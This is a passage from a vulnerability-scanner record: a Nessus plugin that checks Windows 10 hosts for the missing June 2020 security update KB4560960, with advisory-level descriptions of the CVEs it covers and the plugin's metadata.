An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1265, CVE-2020-1282, CVE-2020-1304,\n CVE-2020-1306, CVE-2020-1334)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. 
The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. 
An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. 
(CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when the\n Windows Spatial Data Service improperly handles objects\n in memory. An attacker could exploit the vulnerability\n to overwrite or modify a protected file leading to a\n privilege escalation. 
(CVE-2020-1441)", "edition": 11, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-09T00:00:00", "title": "KB4560960: Windows 10 Version 1903 and Windows 10 Version 1909 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1073", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1275", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1310", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1273", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1441", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1307", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1209", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1313", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1265", "CVE-2020-1268", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1206", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1248", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1260", "CVE-2020-1217", 
"CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-06-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4560960.NASL", "href": "https://www.tenable.com/plugins/nessus/137254", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137254);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/13\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1206\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1209\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1248\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1265\",\n \"CVE-2020-1266\",\n \"CVE-2020-1268\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1273\",\n 
\"CVE-2020-1274\",\n \"CVE-2020-1275\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1307\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1313\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\",\n \"CVE-2020-1441\"\n );\n script_xref(name:\"MSKB\", value:\"4560960\");\n script_xref(name:\"MSFT\", value:\"MS20-4560960\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0300-S\");\n\n script_name(english:\"KB4560960: Windows 10 Version 1903 and Windows 10 Version 1909 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4560960. It is, \ntherefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. 
An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. 
An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. 
(CVE-2020-1238,\n CVE-2020-1239)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. 
(CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. 
An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. 
The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. 
An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1265, CVE-2020-1282, CVE-2020-1304,\n CVE-2020-1306, CVE-2020-1334)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the user's system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. 
The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. 
An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. 
An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when the Microsoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. 
(CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the user's system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when the\n Windows Spatial Data Service improperly handles objects\n in memory. An attacker could exploit the vulnerability\n to overwrite or modify a protected file leading to a\n privilege escalation. 
(CVE-2020-1441)\");\n # https://support.microsoft.com/en-us/help/4560960/windows-10-update-kb4560960\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?98e819b7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4560960.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1307\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows Update Orchestrator unchecked ScheduleWork call');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", 